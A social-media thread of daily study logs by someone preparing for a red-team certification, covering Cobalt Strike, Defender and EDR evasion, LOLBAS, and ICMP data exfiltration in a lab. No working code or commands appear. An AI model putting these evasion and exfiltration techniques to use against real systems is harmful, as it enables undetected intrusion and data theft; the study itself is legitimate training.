ath0#hack100days Day 1. CRTO lab. Managing DNS is not my forte. Anyway, made some progress w/DNS and HTTP listeners.
#hack100days Day 2. More CRTO w/harder look at pivot listeners and their payloads.
#hack100days Day 3. More CRTO. Re-reviewed material on defeating Defender. Thinking through if there's opportunities to incorporate some techniques learned from a couple of @[email protected] streams into the methodology. Maybe in the malleable C2 or in the Aggressor Scripts? More learnin' needed. #getSmart
#hack100days Day 4. More CRTO. Revisited the material on application whitelisting and LOLBAS. The placement in the material is off-putting. Seems like covering this material hand-in-glove with initial access would make more sense. Shooting for banging around in the lab tomorrow.
#hack100days Day 5. #StlCitySC was on tonight, so no CRTO lab. Revisited the ADCS section, though. Also did some AI prompting and looked at #Rust crates for ICMP. I am looking for a way to generate ICMP ECHO REPLY packets in #PowerShell or Rust. (Python isn't installed *everywhere*. Where I'm going has PowerShell or I can drop an executable.) This site is where I'm starting, but my rust skills are not yet strong.
#hack100days Day 6. Revisited extending CS section. Definitely need to spend time with this stuff in the lab. Use of winapi could lead to trouble, so need to grok how to finesse that. Gotta hide from EDR.
#hack100days Day 7. Spent more time on extending #CobaltStrike section of #CRTO. Grokking Aggressor Scripts are CS client extensions. Looked harder at Beacon Object Files, not sure if that's going to be important for the test, though. Found https://github.com/CCob/BOF.NET as a way to pull in some .Net, but it's not yet obvious to me how that works. Regardless. Must. Hit. The. Lab.
#hack100days Day 8. More time on #CRTO, finally got into the lab and worked on the Initial Compromise section. Got acquainted with [[https://github.com/dafthack/MailSniper|Mailsniper]]. (Reckon its utility is shrinking as OWA and Exchange install bases shrink.)
#hack100days Day 9. Got caught up on security newsletters. Pre-Ordered a copy of Evading EDR from No Starch Press by Matt Hand (https://nostarch.com/evading-edr).
#hack100days Day 10. Back to #CRTO and the lab. More initial compromise and some host enumeration. #RedTeam #CobaltStrike
#hack100days Day 11. Compared and contrasted some "AI"s and their ability to generate code. Tested and confirmed some python3/scapy can send ICMP with a payload. Going to explore that some more tomorrow, along with a PowerShell version. Test will be using it as an exfiltration channel. #RedTeam
#hack100days Day 12. Spent some time on personal lab. Trying out Windows and UTM on MacBook Pro M2. Working on powershell version of ICMP exfil. #RedTeam
#hack100days Day 13. Busy day. Saw @securestep9 toot about #BugBountyTips that had this link: https://medium.com/@imshewale/complete-bug-bounty-recon-fundamentals-f283dee5c370 Checked it out and it has an extensive list of tools! So, reviewed that. Ran across a lot of familiar things and saw some new things, so that's useful.
#hack100days Day 14. Slacked a bit over the weekend. Read up on Powershell, its relationship w/C#/.Net. Found some references to using C# to run powershell. Looked at msbuild.exe. I had a tab open talking about 'psattack', but the links to the GitHub page resulted in a 404. It looks like one could write a wrapper in C# that can call PowerShell w/out going through powershell.exe. Seems interesting. (Doing this because I didn't have enough time to bang around in CRTO lab.) #RedTeam #LOLBAS #PowerShell
#hack100days Day 15, delayed. At a cybersecurity happy hour last night, spent some time brainstorming some techniques for "multiplexing" C2 or exfil. Runs the risk of re-implementing techniques from an app using UDP to cover dropped payloads, which runs risk of beacon bloat. Fun thought experiment. #RedTeam
#hack100days Day 16. Watched Alh4zr3d's stream of taking a crack at TryHackMe's Red Team Capstone. #RedTeam #GetSmart
Joel Bennett@scottlink there's a #PowerShell #SDK #NuGet https://www.nuget.org/packages/Microsoft.PowerShell.SDK/
You can create an instance of "PowerShell" and invoke code, or even host PowerShell for automating your app...
Not sure any of their examples still work though 😜 https://github.com/MicrosoftDocs/powershell-sdk-samples
@jaykul Thank you, I'll check 'em out!
